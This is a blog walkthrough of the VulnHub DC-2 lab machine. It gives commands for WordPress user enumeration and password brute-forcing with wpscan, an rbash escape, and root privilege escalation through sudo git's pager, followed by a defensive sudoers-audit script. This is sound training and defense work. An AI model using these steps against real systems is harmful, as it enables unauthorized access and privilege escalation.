[vulnhub range] - DC2
2022-04-23 12:38:00 【weixin_ forty-three million four hundred and forty-six thousand】
1. Environment configuration
kali: 88.16.153.14
dc-2: 88.16.153.6
Configure the hosts file:
Linux: vi /etc/hosts
2. Information gathering
2.1 Open ports: 80 and 7744. Port 7744 is the SSH service, which usually runs on port 22, so this is unusual.
2.2 Browsing the website shows that the CMS is WordPress 5.9.3, and there is a flag1. Roughly translated, it says that my own dictionary will not work, that cewl is needed to collect passwords, and that the flag may not be in the user directory.
2.3 Collect a password dictionary: cewl http://dc-2/ -w w.txt
2.4 Because the CMS is WordPress, its admin directory can be looked up on Baidu. The admin login page of this site is http://dc-2/wp-login.php
3. Penetration
3.1 Kali ships with wpscan, a WordPress scanning tool. Use it to enumerate user names:
wpscan --url dc-2 -e u
This returns three user names; save them in user.txt.
Then use wpscan for brute forcing:
wpscan --url dc-2 -U user.txt -P w.txt
This yields jerry/adipiscing and tom/parturient.
3.2 Log in to the website and find flag2. The hint is that if the WordPress vulnerability cannot be exploited, other entry points can be tried.
3.3 During port collection, port 7744 turned out to be the SSH port, so try an SSH login with the brute-forced user names and passwords. Logging in as jerry fails with a permission error; logging in as tom succeeds.
Obtain flag3.
Judging by the content of flag3, it is necessary to switch to the jerry user with su, but the su command is not available. According to the error message, this calls for an rbash escape. I don't really understand it; you can look it up on Baidu yourself.
BASH_CMDS[a]=/bin/sh ;
a # call the /bin/sh command interpreter
/bin/bash # use the bash command interpreter
export PATH=$PATH:/bin:/sbin:/usr/bin:/usr/sbin # set the PATH environment variable
flag4 is found in the /home/jerry directory.
According to the hint, git is used for privilege escalation; git has root privileges.
sudo git help config
!/bin/bash
Successfully found the last flag.
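The last step works because a sudo rule lets a normal user run git as root, and git's help pager can start a shell. The following audit script is an added example, not part of the original post: it scans sudoers-style rules for root grants on programs with such an escape. The program list and the sample rules are assumptions constructed for illustration.

```python
import os
import re

# Assumption: a short, non-exhaustive set of programs that can start a shell
# from inside themselves (pager or editor escapes), as git does on this page.
SHELL_CAPABLE = {"git", "less", "more", "man", "vi", "vim", "find", "awk"}

# user host = (runas) [TAG:] command[, command ...]
SPEC = re.compile(r"^(\S+)\s+([^\s=]+)\s*=\s*(?:\(([^)]*)\)\s*)?(.+)$")
TAG = re.compile(r"^(NOPASSWD|PASSWD|NOEXEC|EXEC):\s*")

def audit_sudoers(text):
    """Return (line_no, user, command, passwordless) for risky root grants."""
    findings = []
    for line_no, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith(("#", "Defaults")) or "_Alias" in line:
            continue
        m = SPEC.match(line)
        if not m:
            continue
        user, _host, runas, commands = m.groups()
        # No runas list means root; otherwise look at the user part before ':'.
        targets = ["root"] if runas is None else runas.split(":")[0].split(",")
        if not any(t.strip() in ("root", "ALL") for t in targets):
            continue
        state = {"PASSWD": True, "EXEC": True}  # tags carry over to later commands
        for cmd in commands.split(","):
            cmd = cmd.strip()
            while (t := TAG.match(cmd)):
                tag = t.group(1)
                state[tag[2:] if tag.startswith("NO") else tag] = not tag.startswith("NO")
                cmd = cmd[t.end():]
            if not cmd or cmd.startswith("!"):
                continue
            binary = os.path.basename(cmd.split()[0])
            # NOEXEC blocks a dynamically linked program from executing further commands.
            if binary in SHELL_CAPABLE and state["EXEC"]:
                findings.append((line_no, user, cmd, not state["PASSWD"]))
    return findings

# Constructed sample rules, not taken from the DC-2 machine.
SAMPLE = """\
# constructed sudoers lines for illustration
Defaults env_reset
root    ALL=(ALL:ALL) ALL
jerry   ALL=(root) NOPASSWD: /usr/bin/git
backup  ALL=(root) NOEXEC: /usr/bin/less /var/log/syslog
deploy  ALL=(root) NOPASSWD: /usr/bin/systemctl restart nginx, /usr/bin/vim /etc/nginx/nginx.conf
"""
```

Each finding is a rule to remove, to replace with a wrapper script that does one fixed task, or to tag with NOEXEC.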
Copyright notice
This article was written by [weixin_ forty-three million four hundred and forty-six thousand]. Please include the original link when reposting. Thank you.
https://yzsam.com/2022/04/202204231218506522.html